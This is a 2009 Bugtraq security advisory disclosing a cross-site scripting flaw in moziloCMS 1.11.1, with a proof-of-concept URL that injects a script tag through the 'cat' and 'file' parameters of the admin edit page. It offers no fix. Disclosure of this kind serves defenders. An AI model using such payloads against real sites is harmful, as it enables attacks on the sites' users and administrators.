[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200906032151.n53LpI2Q008056@www3.securityfocus.com>
Date: Wed, 3 Jun 2009 15:51:18 -0600
From: security@...ern0t.net
To: bugtraq@...urityfocus.com
Subject: [InterN0T] moziloCMS 1.11.1 - XSS Vulnerability
moziloCMS - Cross Site Scripting Vulnerability
Version Affected: 1.11.1 (19th May 2009) (newest)
Info: See website for more information. (It's in german and i don't bother translating)
Credits: InterN0T
External Links:
http://cms.mozilo.de/
-:: The Advisory ::-
Vulnerable Function / ID Calls: (XSS)
cat & file (these has to be used in conjunction with action=editsite).
Cross Site Scripting:
http://www.website.tld/moziloCMS/admin/index.php?action=editsite&cat="><script>alert(0)</script>&file="><script>alert(0)</script>
-:: Solution ::-
I didn't bother to find one, sorry.
Reference:
http://forum.intern0t.net/intern0t-advisories/1080-intern0t-mozilocms-1-11-1-cross-site-scripting-vulnerability.html
Disclosure Information:
- Vulnerability found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.
All of the best,
MaXe
Powered by blists - more mailing lists